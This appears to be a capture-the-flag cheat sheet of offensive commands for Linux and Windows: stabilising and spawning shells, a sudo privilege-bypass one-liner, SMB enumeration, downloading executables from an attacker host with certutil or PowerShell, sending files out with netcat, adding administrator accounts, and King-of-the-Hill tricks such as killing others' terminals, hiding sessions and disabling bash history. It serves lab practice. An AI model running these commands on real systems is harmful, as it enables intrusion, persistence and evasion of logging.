CTF-Writeups/Cheat Sheet.md

Linux

Stablilize Shell

1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using clear command

Spawn bash

• /usr/bin/script -qc /bin/bash 1&>/dev/null
• python -c 'import pty;pty.spawn("/bin/bash")'
• python3 -c 'import pty;pty.spawn("/bin/bash")'

Vulnerable sudo version

sudo -u#-1 whoami

Looking for smb shares

SmbClient

• smbclient -L \\\\<ip\\ listing all shares
• smbclient \\\\<ip>\\<share> accessing a share anonymously
• smbclient \\\\10.10.209.122\\<share> -U <share> accessing a share with an authorized user

Smbmap

• smbmap -u <username> -p <password> -H <ip>

Smbget

• smbget -R smb://<ip>/<share>

Finding Binaries

• find . - perm /4000 (user id uid)
• find . -perm /2000 (group id guid)

Changing file attributes

chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes

Uploading Files

scp file/you/want user@ip:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000

Downloading Files

wget http://:port/

Netcat to download files from target

nc -l -p [port] > file Receive file
nc -w 3 [ip] [port] < file Send file

Windows

Adding User

net user "USER_NAME" "PASS" /add

Changing User's password

net user "USER_NAME" "NEWPASS"

Adding User to Administrators

net localgroup administrators "USER_NAME" /add

Changing File Permissions

CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control

Set File bits

attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit

Show hidden file/folder

dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files

Downloading Files

certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe

Msfvenom

List All Payloads

msfvenom -l payloads

List Payload Format

msfvenom --list formats

Meterpreter

Adding user for RDP

run getgui -u [USER_NAME] -p [PASS]

King Of The Hill (KoTH)

Monitoring and Closing Shell (Linux)

• strace debugging / tamper with processes
• gbd c/c++ debugger
• script - records terminal activites
• w /who check current pts ,terminal device
• ps -t ps/pts-number process monitoring
• script /dev/pts/pts-number montior terminal
• cat /dev/urandom > /dev/pts/pts-number 2>/dev/null prints arbitary text on terminal
• pkill -9 -t pts/pts-number

Change SSH port

nano /etc/ssh/sshd_config (change PORT 22 to any port you want also you can tinker with configuration file)

Hide yourself from "w" or "who"

ssh user@ip -T This -T will have some limiations , that you cannot run bash and some other commands but is helpful.

Run Bash script on king.txt

while [ 1 ]; do /root/chattr -i king.txt; done &

Send messages to logged in users

• echo "msg" > /dev/pts/pts-number send message to specific user
  
• wall msg boradcast message to everyone
  

Closing Session (Windows)

• quser
• logoff id|user_name

export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file